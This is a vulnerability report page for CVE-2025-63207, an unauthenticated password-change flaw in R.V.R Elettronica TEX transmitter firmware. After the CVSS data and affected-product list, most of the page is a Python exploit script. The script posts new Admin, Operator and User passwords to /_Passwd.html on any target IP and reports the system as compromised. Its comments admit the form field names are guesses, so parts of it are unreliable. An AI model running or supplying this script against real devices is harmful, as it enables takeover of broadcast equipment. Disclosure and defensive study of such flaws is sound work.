Security Vulnerability Report
CVE-2025-63207 CVSS 9.8 CRITICAL

CVE-2025-63207

Published: 2025-11-19 18:15:49
Last Modified: 2026-01-15 19:55:05

Description

The R.V.R Elettronica TEX product (firmware TEXL-000400, Web GUI TLAN-000400) is vulnerable to broken access control due to improper authentication checks on the /_Passwd.html endpoint. An attacker can send an unauthenticated POST request to change the Admin, Operator, and User passwords, resulting in complete system compromise.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:rvr:tex30lcd\/s_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rvr:tex30lcd\/s:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:rvr:tex50lcd\/s_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rvr:tex50lcd\/s:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:rvr:tex100lcd\/s_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rvr:tex100lcd\/s:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:rvr:tex150lcd\/s_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rvr:tex150lcd\/s:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:rvr:tex300lcd_firmware:texl-000400:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rvr:tex300lcd:-:*:*:*:*:*:*:* - NOT VULNERABLE
R.V.R Elettronica TEX firmware version TEXL-000400
R.V.R Elettronica TEX Web GUI version TLAN-000400

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-63207 PoC - R.V.R Elettronica TEX Password Change Exploit
# Target: R.V.R Elettronica TEX device with firmware TEXL-000400 / Web GUI TLAN-000400
# Vulnerability: Broken Access Control on /_Passwd.html endpoint - No authentication required


def change_password(target_ip, new_password):
    """
    Exploit function to change all user passwords on R.V.R Elettronica TEX

    Args:
        target_ip: Target device IP address
        new_password: New password to set for all users (Admin, Operator, User)

    Returns:
        bool: True if exploitation successful, False otherwise
    """
    url = f"http://{target_ip}/_Passwd.html"

    # Payload to change all user passwords (Admin, Operator, User)
    # The exact parameter names may vary - common patterns shown below
    data = {
        'Admin': new_password,
        'Oper': new_password,
        'User': new_password,
        'submit': 'Apply'  # or 'Save' or 'Change'
    }

    try:
        # Send unauthenticated POST request to change passwords
        response = requests.post(url, data=data, timeout=10)

        if response.status_code == 200:
            print("[+] Password change request sent successfully")
            print(f"[+] Target: {target_ip}")
            print(f"[+] New password set for all users: {new_password}")
            return True
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection failed: {e}")
        return False


def verify_access(target_ip, username, password):
    """
    Verify if the new credentials work
    """
    url = f"http://{target_ip}/login.html"  # or appropriate login endpoint
    data = {'username': username, 'password': password}

    try:
        response = requests.post(url, data=data, timeout=10)
        return response.status_code == 200
    except requests.exceptions.RequestException:
        # Treat any connection or HTTP-layer failure as "not verified"
        return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_63207.py <target_ip> <new_password>")
        print("Example: python cve_2025_63207.py 192.168.1.100 Admin@123")
        sys.exit(1)

    target = sys.argv[1]
    new_pass = sys.argv[2]

    print("=" * 60)
    print("CVE-2025-63207 Exploit - R.V.R Elettronica TEX")
    print("Broken Access Control - Unauthenticated Password Modification")
    print("=" * 60)

    if change_password(target, new_pass):
        print("\n[!] Exploitation successful - System compromised")
        print("[!] You can now login with any user account using the new password")
    else:
        print("\n[-] Exploitation failed")
```
